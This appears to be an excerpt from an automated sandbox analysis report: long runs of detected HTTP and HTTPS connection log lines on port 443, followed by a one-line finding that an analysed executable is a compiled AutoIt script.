Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50059 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50067
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50076
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50075
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930

Source: unknown	HTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49941 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49998 version: TLS 1.2

System Summary

Binary is likely a compiled AutoIt script file

Source: 2922d7c574.exe, 00000011.00000002.2812872415.0000000000A12000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2ca48d91-5
